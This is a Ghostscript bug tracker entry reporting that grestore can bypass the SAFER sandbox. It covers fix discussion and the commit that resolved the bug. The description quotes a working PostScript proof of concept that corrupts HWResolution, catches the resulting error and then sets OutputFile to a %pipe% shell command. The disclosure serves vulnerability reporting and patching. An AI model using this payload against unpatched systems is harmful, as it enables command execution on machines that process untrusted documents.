Bug 699687

Summary: grestore can bypass SAFER
Product: Ghostscript Reporter: Ken Sharp <ken.sharp>
Component: GeneralAssignee: Chris Liddell (chrisl) <chris.liddell>
Status: RESOLVED FIXED    
Severity: normal CC: cbuissar, esachse, scorneli, taviso
Priority: P4    
Version: unspecified   
Hardware: PC   
OS: Windows 7   
Customer: Word Size: ---

Description Ken Sharp 2018-08-29 07:01:10 UTC 
This has been moved from the never-ending bug #699654, the last comment in that thread demonstrates a similar issue to the original report, but using grestore instead of restore:

-------------------------------------------------------------------------------
GS>currentpagedevice wcheck ==
false
GS>currentpagedevice /HWResolution get wcheck ==
true

You can't def HWResolution (for example), but you can just put or astore into it. If you put some junk in there, then grestore doesn't work:

GS>a0
GS>currentpagedevice /HWResolution get 0 (foobar) put
GS>grestore
Error: /rangecheck in .installpagedevice

Then LockSafetyParams is false again:

GS>mark currentdevice getdeviceprops .dicttomark /.LockSafetyParams get == pop
false


That doesnt work with save (only gsave), so full exploit:

a0
currentpagedevice /HWResolution get 0 (foobar) put
{ grestore } stopped {} if
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage
Comment 1 Ken Sharp 2018-09-01 10:16:55 UTC 
*** Bug 699697 has been marked as a duplicate of this bug. ***
Comment 2 Ken Sharp 2018-09-01 10:33:04 UTC 
I have a fix for this which I've asked Chris to review, especially to review any non-standard devices which might be vulnerable in the same way. I imagine we'll have a fix committed shortly.
Comment 3 Ken Sharp 2018-09-03 07:42:33 UTC 
Commit 	7ba6d80c69f0c74601ffc1077d27e0d1a299e57f addresses this issue.